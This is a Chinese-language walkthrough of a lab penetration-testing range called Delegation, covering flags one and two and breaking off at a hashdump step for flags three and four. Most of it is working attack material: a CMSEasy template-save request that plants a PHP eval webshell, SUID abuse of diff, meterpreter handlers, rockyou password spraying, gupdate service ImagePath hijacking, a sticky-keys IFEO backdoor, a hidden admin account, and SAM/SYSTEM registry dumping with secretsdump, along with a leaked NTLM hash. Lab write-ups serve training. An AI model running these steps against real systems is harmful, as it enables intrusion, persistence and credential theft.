春秋云镜 Delegation

前言

本文所使用的工具可参考以下仓库:

Awesome_Pentest_Tools: 一站式渗透测试与红队工具合集,旨在帮助渗透测试人员打造自己的工具链

靶标介绍:

Delegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。

flag1

fscan扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
./fscan -h 39.99.155.213

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
39.99.155.213:80 open
39.99.155.213:22 open
39.99.155.213:21 open
39.99.155.213:3306 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.155.213      code:200 len:68108  title:中文网页标题
已完成 3/4 [-] mysql 39.99.155.213:3306 root root_123 Error 1045 (28000): Access denied for user 'root'@'112.224.157.48' (using password: YES) 
已完成 3/4 [-] mysql 39.99.155.213:3306 root a11111 Error 1045 (28000): Access denied for user 'root'@'112.224.157.48' (using password: YES) 
已完成 3/4 [-] mysql 39.99.155.213:3306 mysql mysql@123 Error 1045 (28000): Access denied for user 'mysql'@'112.224.157.48' (using password: YES) 
已完成 3/4 [-] mysql 39.99.155.213:3306 mysql a123123 Error 1045 (28000): Access denied for user 'mysql'@'112.224.157.48' (using password: YES) 
已完成 4/4
[*] 扫描结束,耗时: 4m49.354047797s


./fscan -h 39.99.155.213  -p 1-65535
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-08-19 21:35:04] [INFO] 暴力破解线程数: 1
[2025-08-19 21:35:04] [INFO] 开始信息扫描
[2025-08-19 21:35:04] [INFO] 最终有效主机数量: 1
[2025-08-19 21:35:04] [INFO] 开始主机扫描
[2025-08-19 21:35:04] [INFO] 有效端口数量: 65535
[2025-08-19 21:35:04] [SUCCESS] 端口开放 39.99.155.213:21
[2025-08-19 21:35:04] [SUCCESS] 端口开放 39.99.155.213:22
[2025-08-19 21:35:04] [SUCCESS] 服务识别 39.99.155.213:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]                                                                                               
[2025-08-19 21:35:04] [SUCCESS] 服务识别 39.99.155.213:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-08-19 21:35:06] [SUCCESS] 端口开放 39.99.155.213:80
[2025-08-19 21:35:12] [SUCCESS] 服务识别 39.99.155.213:80 => [http]
[2025-08-19 21:37:07] [SUCCESS] 端口开放 39.99.155.213:3306
[2025-08-19 21:37:09] [SUCCESS] 服务识别 39.99.155.213:3306 => [mysql] 版本:8.0.29-0ubuntu0.20.04.3 产品:MySQL Banner:[[.8.0.29-0ubuntu0.20.04.3 J.+._e:7.l t +IxbS x0 caching_sha2_password]                                                                                                           
[2025-08-19 22:09:12] [SUCCESS] 端口开放 39.99.155.213:54522
[2025-08-19 22:10:07] [SUCCESS] 服务识别 39.99.155.213:54522 => 
[2025-08-19 22:16:09] [INFO] 存活端口数量: 5
[2025-08-19 22:16:10] [INFO] 开始漏洞扫描
[2025-08-19 22:16:10] [INFO] 加载的插件: ftp, mysql, ssh, webpoc, webtitle
[2025-08-19 22:16:10] [SUCCESS] 网站标题 http://39.99.155.213      状态码:200 长度:68108  标题:中文网页标题
[2025-08-19 23:21:57] [SUCCESS] 扫描已完成: 5/5

cmseasy

入口cmseasy的页面,找到后台/admin,弱口令admin 123456登录

找到漏洞利用文章:文章

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.155.213
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://39.99.155.213/index.php?admin_dir=admin&site=default
Cookie: PHPSESSID=ni864mom439a8hh0g9954o4v12; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

sid=#data_d_.._d_.._d_.._d_matrix.php&slen=693&scontent=<?php eval($_REQUEST[1]);phpinfo();?>

# 或者hackbar也行
# get
?case=template&act=save&admin_dir=admin&site=default
# post
sid=#data_d_.._d_.._d_.._d_5.php&slen=693&scontent=<?php eval($_REQUEST[1]);phpinfo();?>

image-20250820190149664

蚁剑连接,找到flag01,但是没有权限读取

试试目标出没出网,curl ip.sb发现目标出网

  • curl 是一个命令行工具,用于请求网络资源。
  • ip.sb 会返回你当前设备的公网 IP。
  • 如果请求成功,证明目标主机可以连接外网(出网)。
1
2
3
4
5
6
7
8
9
/var/www/html/matrix >curl ip.sb

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100    14  100    14    0     0     41      0 --:--:-- --:--:-- --:--:--    41
100    14  100    14    0     0     41      0 --:--:-- --:--:-- --:--:--    41
39.99.155.213

很多时候蚁剑没有输出结果,比如fscan在蚁剑的shell里就不显示扫描结果,可以换冰蝎或者哥斯拉

哥斯拉传上传之后,直接有执行权限;但是普通上传只能上传小文件(比如木马),大文件传不了(fscan)

想传大文件必须要用大文件上传,此时就没有执行权限了,但是可以在文件属性里改,也可以命令执行赋予

image-20250820234605212

SUID提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
find / -perm -u=s -type f 2>/dev/null

/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

https://gtfobins.github.io/gtfobins/diff/

SUID

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

1
2
3
4
sudo install -m =xs $(which diff) .

LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE

拿flag

1
2
3
4
5
6
7
8
9
10
11
12
diff --line-format=%L /dev/null /home/flag/flag01.txt
  ____  U _____ u  _     U _____ u   ____      _       _____             U  ___ u  _   _     
 |  _"\ \| ___"|/ |"|    \| ___"|/U /"___|uU  /"\  u  |_ " _|     ___     \/"_ \/ | \ |"|    
/| | | | |  _|" U | | u   |  _|"  \| |  _ / \/ _ \/     | |      |_"_|    | | | |<|  \| |>   
U| |_| |\| |___  \| |/__  | |___   | |_| |  / ___ \    /| |\      | | .-,_| |_| |U| |\  |u   
 |____/ u|_____|  |_____| |_____|   \____| /_/   \_\  u |_|U    U/| |\u\_)-\___/  |_| \_|    
  |||_   <<   >>  //  \\  <<   >>   _)(|_   \\    >>  _// \\_.-,_|___|_,-.  \\    ||   \\,-. 
 (__)_) (__) (__)(_")("_)(__) (__) (__)__) (__)  (__)(__) (__)\_)-' '-(_/  (__)   (_")  (_/  
flag01: flag{16532c2f-ae81-4711-b1b1-5435204acd93}
Great job!!!!!!
Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...

得到了一个提示:Here is the hint: WIN19\Adrian

flag2

上传文件,给权限,上马

1
2
3
4
5
6
7
8
9
chmod +x ./*

./linux_x64_admin -c 39.99.155.213:54523 -s matrix

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 39.99.155.213
set LPORT 54520
run

看网段,fscan进行扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.4.36  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe03:2a6  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:03:02:a6  txqueuelen 1000  (Ethernet)
        RX packets 936458  bytes 634707499 (634.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 660642  bytes 401435636 (401.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 48186  bytes 12474276 (12.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 48186  bytes 12474276 (12.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

./fscan -h 172.22.4.0/24
   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7      is alive
(icmp) Target 172.22.4.19     is alive
(icmp) Target 172.22.4.36     is alive
(icmp) Target 172.22.4.45     is alive
[*] Icmp alive hosts len is: 4
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.7:445 open
172.22.4.19:445 open
[*] alive ports len is: 15
start vulscan
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server
[*] OsInfo 172.22.4.7   (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题

# fscan 2.0.0的结果:

[2025-08-20 23:42:48] [HOST] 目标:172.22.4.7 状态:alive 详情:protocol=ICMP
[2025-08-20 23:42:48] [HOST] 目标:172.22.4.45 状态:alive 详情:protocol=ICMP
[2025-08-20 23:42:48] [HOST] 目标:172.22.4.19 状态:alive 详情:protocol=ICMP
[2025-08-20 23:42:48] [HOST] 目标:172.22.4.36 状态:alive 详情:protocol=ICMP
[2025-08-20 23:42:54] [PORT] 目标:172.22.4.36 状态:open 详情:port=80
[2025-08-20 23:42:54] [PORT] 目标:172.22.4.36 状态:open 详情:port=21
[2025-08-20 23:42:54] [SERVICE] 目标:172.22.4.36 状态:identified 详情:port=21, service=ftp, version=3.0.3, product=vsftpd, os=Unix, banner=220 (vsFTPd 3.0.3).
[2025-08-20 23:42:54] [PORT] 目标:172.22.4.45 状态:open 详情:port=445
[2025-08-20 23:42:54] [PORT] 目标:172.22.4.19 状态:open 详情:port=445
[2025-08-20 23:42:54] [PORT] 目标:172.22.4.7 状态:open 详情:port=445
[2025-08-20 23:42:54] [PORT] 目标:172.22.4.7 状态:open 详情:port=389
[2025-08-20 23:42:54] [PORT] 目标:172.22.4.19 状态:open 详情:port=139
[2025-08-20 23:42:54] [PORT] 目标:172.22.4.45 状态:open 详情:port=139
[2025-08-20 23:42:55] [PORT] 目标:172.22.4.7 状态:open 详情:port=139
[2025-08-20 23:42:55] [PORT] 目标:172.22.4.19 状态:open 详情:port=135
[2025-08-20 23:42:55] [PORT] 目标:172.22.4.45 状态:open 详情:port=135
[2025-08-20 23:42:55] [PORT] 目标:172.22.4.7 状态:open 详情:port=135
[2025-08-20 23:42:55] [PORT] 目标:172.22.4.45 状态:open 详情:port=80
[2025-08-20 23:42:55] [PORT] 目标:172.22.4.36 状态:open 详情:port=22
[2025-08-20 23:42:55] [SERVICE] 目标:172.22.4.36 状态:identified 详情:port=22, service=ssh, version=8.2p1 Ubuntu 4ubuntu0.5, product=OpenSSH, os=Linux, info=Ubuntu Linux; protocol 2.0, banner=SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.
[2025-08-20 23:42:55] [PORT] 目标:172.22.4.7 状态:open 详情:port=88
[2025-08-20 23:42:55] [PORT] 目标:172.22.4.36 状态:open 详情:port=3306
[2025-08-20 23:42:55] [SERVICE] 目标:172.22.4.36 状态:identified 详情:port=3306, service=mysql, version=8.0.29-0ubuntu0.20.04.3, product=MySQL, banner=[.8.0.29-0ubuntu0.20.04.3 C.g@c%w.S.a|RH |ldM.caching_sha2_password
[2025-08-20 23:42:59] [SERVICE] 目标:172.22.4.45 状态:identified 详情:service=unknown, port=445
[2025-08-20 23:42:59] [SERVICE] 目标:172.22.4.19 状态:identified 详情:port=445, service=unknown
[2025-08-20 23:42:59] [SERVICE] 目标:172.22.4.7 状态:identified 详情:port=445, service=unknown
[2025-08-20 23:42:59] [SERVICE] 目标:172.22.4.7 状态:identified 详情:product=Microsoft Windows Active Directory LDAP, os=Windows, info=Domain: xiaorang.lab, Site: Default-First-Site-Name, port=389, service=ldap
[2025-08-20 23:42:59] [SERVICE] 目标:172.22.4.19 状态:identified 详情:port=139, service=unknown, banner=.
[2025-08-20 23:42:59] [SERVICE] 目标:172.22.4.45 状态:identified 详情:port=139, service=unknown, banner=.
[2025-08-20 23:43:00] [SERVICE] 目标:172.22.4.7 状态:identified 详情:port=139, service=unknown, banner=.
[2025-08-20 23:43:00] [SERVICE] 目标:172.22.4.7 状态:identified 详情:port=88, service=unknown
[2025-08-20 23:43:00] [SERVICE] 目标:172.22.4.45 状态:identified 详情:service=http, port=80
[2025-08-20 23:43:03] [SERVICE] 目标:172.22.4.36 状态:identified 详情:port=80, service=http
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.19 状态:identified 详情:port=135, service=unknown
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.45 状态:identified 详情:service=unknown, port=135
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.7 状态:identified 详情:port=135, service=unknown
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.7 状态:identified 详情:ipv4=[172.22.4.7], ipv6=[], hostname=DC01
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.45 状态:identified 详情:title=IIS Windows Server, url=http://172.22.4.45, status_code=200, length=703, server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Wed, 20 Aug 2025 15:44:00 GMT etag:"10257bd95886d81:0" last-modified:Wed, 22 Jun 2022 16:55:17 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.19 状态:identified 详情:hostname=FILESERVER, ipv4=[172.22.4.19], ipv6=[]
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.45 状态:identified 详情:hostname=WIN19, ipv4=[172.22.4.45], ipv6=[]
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.36 状态:identified 详情:port=80, service=http, title=中文网页标题, url=http://172.22.4.36, status_code=200, length=68100, server_info=map[cache-control:no-store, no-cache, must-revalidate content-type:text/html; charset=utf-8 date:Wed, 20 Aug 2025 15:44:00 GMT expires:Thu, 19 Nov 1981 08:52:00 GMT length:68100 pragma:no-cache server:Apache/2.4.41 (Ubuntu) set-cookie:PHPSESSID=gu3cq4jhu6o1nhicspiftgnp87; path=/ status_code:200 title:中文网页标题 vary:Accept-Encoding], fingerprints=[]
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.45 状态:identified 详情:port=139, domain_name=XIAORANG, workstation_service=WIN19, server_service=WIN19
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.7 状态:identified 详情:port=445, service=smb, os=Windows Server 2016 Datacenter 14393
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.7 状态:identified 详情:domain_name=xiaorang.lab, netbios_computer=DC01, workstation_service=DC01, domain_controllers=XIAORANG, computer_name=DC01.xiaorang.lab, netbios_domain=XIAORANG, server_service=DC01, os_version=Windows Server 2016 Datacenter 14393, port=139
[2025-08-20 23:44:00] [SERVICE] 目标:172.22.4.19 状态:identified 详情:netbios_computer=FILESERVER, workstation_service=FILESERVER, server_service=FILESERVER, os_version=Windows Server 2016 Standard 14393, port=139, computer_name=FILESERVER.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG

总结一下

1
2
3
4
Target 172.22.4.7      DC:DC01.xiaorang.lab,Windows Server 2016 Datacenter 14393
Target 172.22.4.19     FILESERVER.xiaorang.lab,Windows Server 2016 Standard 14393
Target 172.22.4.36     已拿下
Target 172.22.4.45     XIAORANG\WIN19,IIS Windows Server
  • 172.22.4.36:80(web),22(ssh),21(ftp),3306(mysql);Web服务,网页标题“中文网页标题”,响应长度较大(len:68100)
  • 172.22.4.19:135,139,445;主机名 FILESERVER.xiaorang.lab,操作系统 Windows Server 2016 Standard
  • 172.22.4.7:135,139,88,445;主机名 DC01.xiaorang.lab,操作系统 Windows Server 2016 Datacenter
  • 172.22.4.45:80,135,139,445;主机名 WIN19,Web服务为 IIS Windows Server,网页标题“IIS Windows Server”

根据上文的提示尝试密码喷洒,用户名为 WIN19\Adrian,密码字典为 rockyou.txt,

爆破结果如下,发现babygirl1和其他的不一样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/lib/python3/dist-packages/cme/cli.py:37: SyntaxWarning: invalid escape sequence '\ '
  formatter_class=RawTextHelpFormatter)
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:49: SyntaxWarning: invalid escape sequence '\p'
  stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % self.__host
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:93: SyntaxWarning: invalid escape sequence '\{'
  command = self.__shell + 'echo '+ data + ' ^> \\\\127.0.0.1\\{}\\{} 2^>^&1 > %TEMP%\{} & %COMSPEC% /Q /c %TEMP%\{} & %COMSPEC% /Q /c del %TEMP%\{}'.format(self.__share_name, self.__output, self.__batchFile, self.__batchFile, self.__batchFile)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'
  self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'
  self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:135  ...  OK
SMB         172.22.4.45     445    WIN19            [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN19) (domain:WIN19) (signing:False) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
。。。
SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:claudia STATUS_LOGON_FAILURE 
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED 
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:angelica STATUS_LOGON_FAILURE 
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.45:445  ...  OK
SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:austin STATUS_LOGON_FAILURE

image-20250820215307863

登陆后发现需要改密码,进入到修改密码的页面

1
2
3
4
5
6
# 先改密码
proxychains xfreerdp3 /u:Adrian /p:babygirl1 /d:WIN19 /v:172.22.4.45 /cert:ignore /sec:tls
# 再登录
proxychains xfreerdp3 /u:Adrian /p:12345678 /d:WIN19 /v:172.22.4.45 /cert:ignore
# rdesktop也可以登录,不过不能直接复制粘贴二进制软件,需要挂载
proxychains rdesktop 172.22.4.45 -u 'Adrian' -d 'WIN19' -p '12345678' -r clipboard:CLIPBOARD -r disk:mydisk="/home/matrix/Desktop/"

成功登录,在桌面上看到PrivescCheck,这个是一个windows的提权脚本:https://github.com/itm4n/PrivescCheck,发现其生成了报告

所以我们看一下生成的html文件

image-20250821004815640

看下面这个high,大致说是注册表可以修改,以及可以修改的路径。所以这里我们可以篡改谷歌更新服务注册表进行提权。

之所以能够提权,是因为这个gupdate是系统服务,有system权限。而当前用户对 gupdate 服务的注册表项具有写权限,并且可以启动和停止 gpupdate 服务

image-20250820220410672

放大一点看

64ff20f7661c6c8e54903d7a

修改注册表提权

这里有很多种利用方法,但大同小异,本质都是修改注册表键值然后重启gupdate服务。

服务映像路径劫持

这里我们来执行msf马:先用msf生成一个正向连接的木马,然后劫持gupdate服务,然后再重新启动服务即可

注意:这里powershell修改注册表是无效的,cmd才有用

1
2
3
4
5
6
7
8
9
10
11
12
# 劫持gupdate服务为msf木马
reg add HKLM\SYSTEM\CurrentControlSet\Services\gupdate /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\mb24.exe"

# 重新启动gupdate服务
sc start gupdate

# msf连接
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 54524
run

但是session的存活时间很短,这里要迁移进程,注意迁移的时候选择NT AUTHORITY\SYSTEM进程迁移;同时,Windows 对关键系统进程(如 services.exe, lsass.exe 等)通常有更高的保护,普通用户、非管理员权限或非 SYSTEM 权限的 session 是无法迁移进去的。

这里选择svchost.exe 进行迁移

1
2
ps
migrate 288

如下图已经是system权限,成功读取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
cat /users/administrator/flag/flag02.txt
PS C:\Windows\system32> cat /users/administrator/flag/flag02.txt
cat /users/administrator/flag/flag02.txt
 ________  _______   ___       _______   ________  ________  _________  ___  ________  ________      
|\   ___ \|\  ___ \ |\  \     |\  ___ \ |\   ____\|\   __  \|\___   ___\\  \|\   __  \|\   ___  \    
\ \  \_|\ \ \   __/|\ \  \    \ \   __/|\ \  \___|\ \  \|\  \|___ \  \_\ \  \ \  \|\  \ \  \\ \  \   
 \ \  \ \\ \ \  \_|/_\ \  \    \ \  \_|/_\ \  \  __\ \   __  \   \ \  \ \ \  \ \  \\\  \ \  \\ \  \  
  \ \  \_\\ \ \  \_|\ \ \  \____\ \  \_|\ \ \  \|\  \ \  \ \  \   \ \  \ \ \  \ \  \\\  \ \  \\ \  \ 
   \ \_______\ \_______\ \_______\ \_______\ \_______\ \__\ \__\   \ \__\ \ \__\ \_______\ \__\\ \__\
    \|_______|\|_______|\|_______|\|_______|\|_______|\|__|\|__|    \|__|  \|__|\|_______|\|__| \|__|


flag02: flag{c580833c-451c-4ba2-8077-487ab8d4dd5e}

可以创建用户并加入管理组

1
2
3
4
# 创建新用户
net user matrix$ Matrix2025! /add
# 将用户添加至管理员组
net localgroup administrators matrix$ /add

IFEO 劫持

我们来劫持粘滞键,通过修改注册表来写入shift后门来提权(当然也可以劫持到放大镜上,我们在Initial这个靶场演示过)

新建shift.bat文件,将 Windows 的“粘滞键”程序(sethc.exe,按5下Shift会弹出)被调试器(Debugger)机制劫持为 cmd.exe:

1
2
# C:\Users\Adrian\Desktop\shift.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

然后用msf生成木马来执行我们的shift.bat脚本

1
msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\shift.bat" --platform windows -f exe-service > evil.exe

依次执行下面的命令

# 修改注册表
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\evil.exe" /f
# 重启服务
sc start gupdate

锁定用户,连续按5下shift,弹出shell。

上面一套流程大概是:

写一个shift.bat脚本,本质上是IFEO 劫持;

然后写一个msf木马,通过该木马运行shift.bat脚本;

然后修改注册表,劫持gupdate服务为msf马(evil.exe),实现高权限执行msf马;

然后,重启服务——>高权限执行msf马——>进而高权限执行shift.bat——>实现粘滞键劫持——>启动粘滞键弹出system shell

system权限下新建用户,上马

1
2
3
4
5
6
7
8
9
10
11
# 创建新用户
net user matrix$ Matrix2025! /add
# 将用户添加至管理员组
net localgroup administrators matrix$ /add

# msf马
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 54525
run

远程连接172.22.4.45,获得flag

1
proxychains xfreerdp3 /u:matrix$ /p:Matrix2025! /d:WIN19 /v:172.22.4.45 /cert:ignore

本地Hash提取

或者Windows本地Hash提取,离线口令破解

创建sacm.bat

# C:\Users\Adrian\Desktop\sacm.bat
reg save HKLM\SYSTEM C:\Users\Adrian\Desktop\system
reg save HKLM\SAM C:\Users\Adrian\Desktop\sam
reg save HKLM\SECURITY C:\Users\Adrian\Desktop\security

这三行命令分别导出系统最核心的注册表哈希数据库

  • SYSTEM:系统配置,包含用于解密SAM的启动密钥
  • SAM:安全账户管理,存储本地用户的Hash
  • SECURITY:安全策略,部分环境下用于辅助解密

用msfvenom生成一个Windows可执行文件(eviltest.exe),它的功能是调用cmd.exe去执行sacm.bat脚本。

1
msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\sacm.bat" --platform windows -f exe-service > eviltest.exe

cmd运行,利用gupdate服务高权限执行木马

# 修改注册表
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\eviltest.exe" /f
# 重启服务
sc start gupdate

Windows本地生成三个文件sam、security、system,下载下来

用Impacket工具(secretsdump)对导出的注册表文件进行离线分析,直接获得本地用户的NTLM/LM Hash

1
impacket-secretsdump LOCAL -sam sam -security security -system system

得到管理员hash,hash传递getshell,获得flag

1
2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:5943c35371c96f19bda7b8e67d041727

手动修改

远程连接过去,手动修改注册表上msf马

打开注册表编辑器

按下 Win + R 键,打开“运行”窗口,输入 regedit,然后按 回车;

或者在 命令提示符(CMD)或 PowerShell 中输入:

1
regedit

image-20250821014339704

这里就手动修改成功了,重启即可

flag03和flag04

后面上传的各种工具需要以管理员权限运行才能正常使用,

hashdump获取hash:

1
2
3
4
5
6
7
hashdump
